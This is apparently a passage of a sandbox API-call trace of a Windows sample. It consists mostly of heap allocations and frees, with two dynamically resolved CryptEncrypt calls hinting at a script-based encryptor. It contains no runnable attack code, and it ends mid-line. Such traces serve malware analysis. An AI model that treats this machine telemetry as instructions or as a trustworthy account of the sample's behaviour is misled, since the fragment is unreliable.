[0253.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0253.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0253.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0253.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0253.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0253.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0253.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0253.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0253.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0253.636] CryptEncrypt (in: hKey=0xa87050, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x577, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x578) returned 1 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0b50 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0253.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0253.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0253.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0253.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0253.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0253.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0253.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0253.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0253.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0253.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0253.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0253.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0253.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0253.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0253.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0253.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0253.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0253.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0253.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0253.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0253.639] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0253.639] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.639] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0253.639] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0253.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0253.640] CharLowerBuffW (in: lpsz="byte[1400]", cchLength=0xa | out: lpsz="byte[1400]") returned 0xa [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0253.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0253.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0253.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0253.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0253.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0253.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0253.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0253.641] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.641] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0253.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0253.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0253.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0253.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0253.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0253.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e518c8 [0253.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e518c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0253.642] CryptEncrypt (in: hKey=0xa87050, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bf0f90*, pdwDataLen=0x8cef60*=0x577, dwBufLen=0x578 | out: pbData=0x3bf0f90*, pdwDataLen=0x8cef60*=0x578) returned 1 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0b50 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0253.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0253.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0253.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0253.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0253.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0253.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0253.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0253.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0253.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0253.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0253.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0253.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0253.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0253.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0253.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0253.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0253.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0253.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0253.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0253.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0253.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0253.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0253.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0253.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0253.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0253.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0253.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0253.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0253.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 